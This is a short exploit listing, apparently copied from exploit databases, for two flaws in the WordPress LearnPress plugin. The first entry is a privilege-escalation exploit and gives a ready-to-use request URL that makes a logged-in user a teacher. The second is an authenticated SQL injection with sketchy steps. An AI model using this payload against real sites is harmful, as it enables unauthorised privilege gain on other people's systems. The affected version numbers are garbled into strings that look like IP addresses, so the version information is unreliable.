# Exploit Title: WordPress Plugin LearnPress < 18.104.22.168 – User Registration Privilege Escalation# https://www.exploit-db.com/exploits/50138# https://packetstormsecurity.com/files/163538/WordPress-LearnPress-Privilege-Escalation.html# Date: 07-17-2021# Exploit Author: nhattruong or nhattruong.blog# Vendor Homepage: https://thimpress.com/learnpress/# Software Link: https://wordpress.org/plugins/learnpress/# Version: < 22.214.171.124# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd# CVE: CVE-2020-11511 POC:1. Find out your user id2. Login with your cred3. Execute the payload http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id> # Done!
DB-Exploit: https://www.exploit-db.com/exploits/50137PacketStorm: https://packetstormsecurity.com/files/163536/WordPress-LearnPress-SQL-Injection.html Exploit Title: WordPress Plugin LearnPress < 126.96.36.199 – SQL Injection (Authenticated) Date: 07-17-2021 Exploit Author: nhattruong or nhattruong.blog Vendor Homepage: https://thimpress.com/learnpress/ Software Link: https://wordpress.org/plugins/learnpress/ Version: < 188.8.131.52 References link: https://wpscan.com/vulnerability/10208 CVE: CVE-2020-6010 POC: Go to url http:///wp-admin Login with a cred Execute the payload Modify current_items as you want